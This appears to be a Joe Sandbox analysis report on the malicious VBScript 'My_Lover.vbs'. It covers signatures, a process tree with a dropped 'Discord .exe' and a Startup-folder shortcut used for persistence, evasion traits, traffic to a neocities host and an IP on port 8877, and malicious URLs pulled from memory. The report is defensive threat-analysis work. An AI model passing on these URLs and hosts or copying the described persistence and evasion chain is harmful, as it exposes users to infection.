Edit tour

Windows Analysis Report
My_Lover.vbs

Overview

General Information

Sample Name:	My_Lover.vbs
Analysis ID:	738336
MD5:	1a329d8554b4d879c9042e91c291c1e6
SHA1:	af1b398fe2c46bf42c49ab0ae9608820db81790e
SHA256:	78a102288e31f10b5e9bf56555da8bc1b9372761563ab45672be4c11e1626243
Tags:	vbs
Infos:

Detection

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Benign windows process drops PE files

VBScript performs obfuscated calls to suspicious functions

Potential evasive VBS script found (sleep loop)

Creates processes via WMI

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

PE file contains executable resources (Code or Archives)

Java / VBScript file with very long strings (likely obfuscated code)

Searches for the Microsoft Outlook file path

Drops PE files

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Creates a start menu entry (Start Menu\Programs\Startup)

PE file contains more sections than normal

Launches processes in debugging mode, may be used to hinder debugging

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to simulate mouse events

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Found WSH timer for Javascript or VBS script (likely evasive script)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

wscript.exe (PID: 4240 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\My_Lover.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

mshta.exe (PID: 6124 cmdline: mshta.exe C:\Users\user~1\AppData\Local\Temp\8901m.jpg MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

Discord .exe (PID: 2788 cmdline: "C:\Users\user\Service\Discord .exe" MD5: 2BC22E2E79238D57504BD3720C240533)

WmiPrvSE.exe (PID: 5340 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)

Discord .exe (PID: 5428 cmdline: C:\Users\user\Service\Discord .exe MD5: 2BC22E2E79238D57504BD3720C240533)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\a.zip	SUSP_ZIP_LNK_PhishAttachment_Pattern_Jun22_1	Detects suspicious tiny ZIP files with phishing attachment characteristics	Florian Roth	0x20:$sl1: .lnk 0x3a8:$sl1: .lnk

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close

Source: global traffic

TCP traffic: 192.168.2.7:49731 -> 91.109.178.2:8877

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.178.2
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.178.2
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.178.2
Source: unknown	TCP traffic detected without corresponding DNS query: 91.109.178.2

Source: Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: Y3hZZGRHM3V3eG5lY1dhb2ladzNTVXB4Tmk4YkFwLTNNSU8xbw&q=https%3A%2F%2Fraboninco.com%2FWMOd https://t.co/ef9DhWRC22 https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbHVtYWlCZVdXc0kyWnhwMzlrYndDT0E5clZRQXxBQ3Jtc0treHk0c2VGejhid0xQb2RadEQ4dmxoR2szZVNYZ0ViQjJleF9ZR1NxdkZfS0ZmWFBINXF6V0JWU3lnTU90NFJFRTB4OFhILVJmREExQ3hsamVGRXRmTGpNSHY3el9rc3o1YjdQQ0VsOWEyTi1Wdlc2dw&q=https%3A%2F%2Fraboninco.com%2FWMNx https://t.co/K9rbut2RUz https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqa3dhdGNROTd0dTdCd05uSVAyMGVmdWVQVWd4UXxBQ3Jtc0ttRURncTdHYWpYckdYNmw5cmNvcnQ4YUlNM1kzQkxnYWU5anhyWFJqRmpZeTJqVk5HQWh3TUFNNnBIMFlCOUpvZmJucVVLYUo3V0trVnhSV3B0emV2aHJNcW5KbVFxVDFSQ1RZTjAxVktRN0dEQnIwVQ&q=https%3A%2F%2Fraboninco.com%2FWMNa https://t.co/FkIvPMf8lS https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqblNrbHBMZEtacGlLcDVHNEJZNXVPZnVVTXB1d3xBQ3Jtc0ttSjN4Y2ZWaUJ3cEpHN3dsYWJmSXBhNXZqZ0NxbEg4eXU0alhtYXhudmp1RGRKVEZsMnpHMXdYZlFYSTFQSDZXNXQtcF9GcHhLZENqMnZQc1E2dFQyajVscFZSZFlYakFyckd5QVhvM25CZHdiaTdEMA&q=https%3A%2F%2Fraboninco.com%2FWMNK https://t.co/RrhqhXOlLE https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbjFXRGN2VlNHQnVSNE01OTFMVmVDdVowVE5vQXxBQ3Jtc0ttd0FEaXRmYnV3Um11OGc0UnE4ZV9oOGxFekdhd3FYMk1XVnZ3SGx3bnh1REVsaXhURFJIT292YnZhMFVDRm9aV0x3UTl3akw1MGdaM2J4cm1wRW02VHNZUzByV2pQUHo1MGxlNldweDh1YUtrR0k3RQ&q=https%3A%2F%2Fraboninco.com%2FWMMs https://t.co/Wz0b3hK7Zn 3 14 24 fffcd702 15 non 14 24 fffcd702 15 non 14 24 fffcd702 15 non ff2040ab ff4e8ff5 ffb5b5b5 15 LLL 0 0 0 0 YouTube DTube 6LcEr_UUAAAAAHXt5wx-k9P_m8Z1JY-Ck9Mxrhxo rien server-4 20 https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbEdtU1dsZlktbHowRC1TbUVqdGItY1Y3TGluQXxBQ3Jtc0trTTVQcWZPTWl0OG9PeFlOd2RuX2VhMGhOSjE2OUxZUHZjWFd0eFpOS2doZ1pRcEk1OWw0WmVVMnp0YWxIeU96WG93dmpSZEFXbi1ROTNVRl9IdlFGdXZDNnVtd2RpWjBiVTlEZk9nbEIxM1Q1NVFoTQ&q=https%3A%2F%2Fouo.io%2F5pldN1C&v=lrRZZO0Q0o0 https://t.co/XlenJSiON3 https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbGRvb3d6MDRMZXQ4T1B4c1RxZE4zXzUtSTJsd3xBQ3Jtc0tuYTU4aDlYNGNKSXBncU9GYXNheHNjUTVzd0Q5ZjZLQllTS2NQODlRcldkeXVQbVEzM09sT09CYlJ2bnRkWGtaX1FsWmE3ejJ4eEd5NGNSWGM5WmpDdEJwaFNKeWxpamVWTWpWcy11WTVyRHg4QU9rYw&q=https%3A%2F%2Fouo.io%2F9RIGYPS&v=lrRZZO0Q0o0 https://t.co/CdOqLONoRi https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqa2hGTFViSm9jbmVadVBrdE1hcHFsMVN6SUNsQXxBQ3Jtc0tuSjR0b2hBQ0c5QnZtamJJb1I1ekxyUHFBQTVVOEhmY1RZUmZxbjkzUk9naC1iZjh5cUJoenhSM1JqT2JOSk50Ym1RNGlaMV9OZVBqWW9ISWMzVG1TbjZTS3pUdk1XX0hYOEFHOVNwQTJQQ0JvNGVOTQ&q=https%3A%2F%2Fouo.io%2FASTQ07&v=lrRZZO0Q0o0 https://t.co/dyNTsIXnAp https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqblZycFpnMU1pMlJBekIyY3YyaDlYTDh3ZjZJd3xBQ3Jtc0tuYjhvOUJ1OFdhaTR2cElRYmJBMFRQS1VWUGttazRNN2x6b3dWRUhfWjF4dk5EOVJMNnlxSndESlFkVm5DNi1rcTB0X3hTQm1tMzVGWFlCaFVwS21YUkprR005b3FJamlaZmo5SzRCRTdTZHJ2NTQtUQ&q=https%3A%2F%2Fouo.io%2FX19Tf6Z&v=lrRZZO0Q0o0 https://t.co/QRzQHZaNqc https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbm9xWW84NXlwekxYVzJWNEczYmI0VkpTcWhRQXxBQ3Jtc0t

Source: wscript.exe, 00000000.00000003.272578226.000001483BB26000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.271394063.000001483BB21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.273020781.000001483BB26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?8b69df9238683
Source: Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.co/CdOqLONoRi
Source: Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.co/FkIvPMf8lS
Source: Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.co/GzOeLXftEP
Source: Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.co/K9rbut2RUz
Source: Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.co/QRzQHZaNqc
Source: Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.co/RrhqhXOlLE
Source: Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.co/Wz0b3hK7Zn
Source: Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.co/XlenJSiON3
Source: Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.co/Z6zebveHUm
Source: Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.co/dyNTsIXnAp
Source: Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.co/ef9DhWRC22
Source: Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.co/uNCapZTROn
Source: Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/redirect?event=&redir_token=QUF
Source: Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqa2hGTFViSm9jbmVadVBrdE1hcHFsMVN6SUNsQXxB
Source: Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqa3dhdGNROTd0dTdCd05uSVAyMGVmdWVQVWd4UXxB
Source: Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbEdtU1dsZlktbHowRC1TbUVqdGItY1Y3TGluQXxB
Source: Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbGRvb3d6MDRMZXQ4T1B4c1RxZE4zXzUtSTJsd3xB
Source: Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbHVtYWlCZVdXc0kyWnhwMzlrYndDT0E5clZRQXxB
Source: Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbUo2U1o4VFBhcmZpRVFtVHdFSXNPbkt6MU9GQXxB
Source: Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbWpRcEhINFp5a09mUzk5ckg0X2pNZFlpSTJGUXxB
Source: Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbjFXRGN2VlNHQnVSNE01OTFMVmVDdVowVE5vQXxB
Source: Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqblNrbHBMZEtacGlLcDVHNEJZNXVPZnVVTXB1d3xB
Source: Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqblZycFpnMU1pMlJBekIyY3YyaDlYTDh3ZjZJd3xB
Source: Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbm9xWW84NXlwekxYVzJWNEczYmI0VkpTcWhRQXxB

Source: unknown

DNS traffic detected: queries for: c1-wi.neocities.org

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: c1-wi.neocities.orgConnection: close

Source: C:\Users\user\Service\Discord .exe

Code function: 14_2_6DE822F0 _Z7setCTetPKc,MultiByteToWideChar,MultiByteToWideChar,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,CloseClipboard,

14_2_6DE822F0

Source: C:\Users\user\AppData\Local\Temp\a.zip, type: DROPPED

Matched rule: SUSP_ZIP_LNK_PhishAttachment_Pattern_Jun22_1 date = 2022-06-23, hash5 = b59788ae984d9e70b4f7f5a035b10e6537063f15a010652edd170fc6a7e1ea2f, hash4 = ddc20266e38a974a28af321ab82eedaaf51168fbcc63ac77883d8be5200dcaf9, hash3 = 9c70eeac97374213355ea8fa019a0e99e0e57c8efc43daa3509f9f98fa71c8e4, hash2 = c4fec375b44efad2d45c49f30133efbf6921ce82dbb2d1a980f69ea6383b0ab4, author = Florian Roth, description = Detects suspicious tiny ZIP files with phishing attachment characteristics, score = 4edb41f4645924d8a73e7ac3e3f39f4db73e38f356bc994ad7d03728cd799a48, reference = Internal Research

Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE8FD70	14_2_6DE8FD70
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE90C70	14_2_6DE90C70
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE9A7FC	14_2_6DE9A7FC
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE987C0	14_2_6DE987C0
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE98780	14_2_6DE98780
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE98740	14_2_6DE98740
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE9870C	14_2_6DE9870C
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE986E4	14_2_6DE986E4
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE986E4	14_2_6DE986E4
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE986E4	14_2_6DE986E4
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE986E4	14_2_6DE986E4
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE986E4	14_2_6DE986E4
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE83BD0	14_2_6DE83BD0
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE86370	14_2_6DE86370
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001B4175	16_3_001B4175
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001B4175	16_3_001B4175
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001B4175	16_3_001B4175
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001B4175	16_3_001B4175
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001CDB4A	16_3_001CDB4A
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001CDB4A	16_3_001CDB4A
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001CDB4A	16_3_001CDB4A
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001CD38B	16_3_001CD38B
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001CD38B	16_3_001CD38B
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001CD38B	16_3_001CD38B
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001B4175	16_3_001B4175
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001B4175	16_3_001B4175
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001B4175	16_3_001B4175
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001B4175	16_3_001B4175
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001CDB4A	16_3_001CDB4A
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001CDB4A	16_3_001CDB4A
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001CDB4A	16_3_001CDB4A
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001CD38B	16_3_001CD38B
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001CD38B	16_3_001CD38B
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001CD38B	16_3_001CD38B
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001B4175	16_3_001B4175
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001B4175	16_3_001B4175
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001B4175	16_3_001B4175
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001B4175	16_3_001B4175
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001CDB4A	16_3_001CDB4A
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001CDB4A	16_3_001CDB4A
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001CDB4A	16_3_001CDB4A
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001CD38B	16_3_001CD38B
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001CD38B	16_3_001CD38B
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001CD38B	16_3_001CD38B
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001B4175	16_3_001B4175
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001B4175	16_3_001B4175
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001B4175	16_3_001B4175
Source: C:\Users\user\Service\Discord .exe	Code function: 16_3_001B4175	16_3_001B4175

Source: Discord .exe.0.dr

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: My_Lover.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: DPUB1.dll.0.dr	Static PE information: Number of sections : 11 > 10
Source: DRES1.dll.0.dr	Static PE information: Number of sections : 11 > 10
Source: DSER1.dll.0.dr	Static PE information: Number of sections : 11 > 10
Source: DFO1.dll.0.dr	Static PE information: Number of sections : 11 > 10

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\My_Lover.vbs"
Source: unknown	Process created: C:\Windows\System32\mshta.exe mshta.exe C:\Users\user~1\AppData\Local\Temp\8901m.jpg
Source: unknown	Process created: C:\Users\user\Service\Discord .exe "C:\Users\user\Service\Discord .exe"
Source: unknown	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process created: C:\Users\user\Service\Discord .exe C:\Users\user\Service\Discord .exe
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process created: C:\Users\user\Service\Discord .exe C:\Users\user\Service\Discord .exe	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: V3.lnk.0.dr

LNK file: ..\..\Service\Discord .exe

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V3.lnk

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user~1\AppData\Local\Temp\8901m.jpg

Jump to behavior

Source: classification engine

Classification label: mal64.evad.winVBS@6/18@1/2

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Service\Discord .exe

Code function: 14_2_6DE8C507 EnumWindows,EnumWindows,_ZdlPv,CreateToolhelp32Snapshot,EnumWindows,_ZNKSs4findEPKcjj,_ZNSsC1ERKSsjj,_ZNSs4swapERSs,_ZNSsC1ERKSsjj,_ZNSs4swapERSs,_ZNSs12_S_constructEjcRKSaIcE,_ZNSs7reserveEj,_ZNSs6appendEPKcj,_ZNSs6appendERKSs,_ZNSs6appendEPKcj,_ZNSs12_S_constructEjcRKSaIcE,_ZNSs6appendERKSs,_ZNSs12_S_constructEjcRKSaIcE,_ZNSs6appendEPKcj,_ZNSs12_S_constructEjcRKSaIcE,_ZNSs6appendERKSs,_ZNSs12_S_constructEjcRKSaIcE,_ZNSs6appendEPKcj,_ZNSs12_S_constructEjcRKSaIcE,CreateProcessA,EnumWindows,_Z10Choixhndlev,

14_2_6DE8C507

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\My_Lover.vbs"

Source: C:\Windows\System32\wscript.exe

File written: C:\Users\user\Service\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Service\Discord .exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Service\Discord .exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Service\Discord .exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Service\Discord .exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: My_Lover.vbs

Static file information: File size 2491267 > 1048576

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

